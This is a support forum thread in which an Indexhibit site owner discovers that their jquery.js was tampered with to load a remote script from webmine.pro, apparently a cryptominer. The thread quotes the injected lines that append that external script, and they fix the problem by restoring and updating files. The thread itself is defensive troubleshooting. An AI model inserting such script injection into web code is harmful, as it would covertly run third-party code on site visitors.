Indexhibit Support

Hi!

I have Indexhibit 2.1.5 on my web. I installed the Brave browser, I went to my web to check it and I received this notice: tracker bloked: http: // webmine. pro / lib / crlt. js

I asked my host. They said my website was clean.
I went to isithacked.com. They said my website was clean.
I guess it would be a mistake for that Brave browser.

But I opened the Safari inspector and I saw that there was three .js working in my web: jquery, jqueryindexpand (both in my domain), and crlt.js (this one pointing to webmine.pro).

I opened jquery.js via ftp and I see at the end:

1. // do stuff with the script
2. };
3. script.src = "// webmine .pro / lib / crlt .js" 

document.head.appendChild (script);

In the inspector, I also saw something apparently sending info to this web page: sea (dot) directprimal (dot) com :(

I replaced the injected (or whatever) jquery.js file with the original indexhibit jquery.js and the problem seems to be solved; Brave don't show trackers blocked in my web and neither Safari shows nothing strange.

When you upgraded to 2.1.5 did you upgrade everything? Including ndxzsite files...

I am not 100% sure, Vaska, but I think so: all files in ndxzsite/js folder are dated February 19, 2018...

Wait! I searched for the backup of my site that I did before the update to 2.1.5, and the malicious code was already there! So no, it seems that jquery.js was an old pre-2.1.5 file... I guess that's good news.

Yep...and that you had not updated everything. Make sure you have updated all of the /ndxzsite/plugin.jxs_****.php files to the newest versions.

Done. Thank you Vaska :)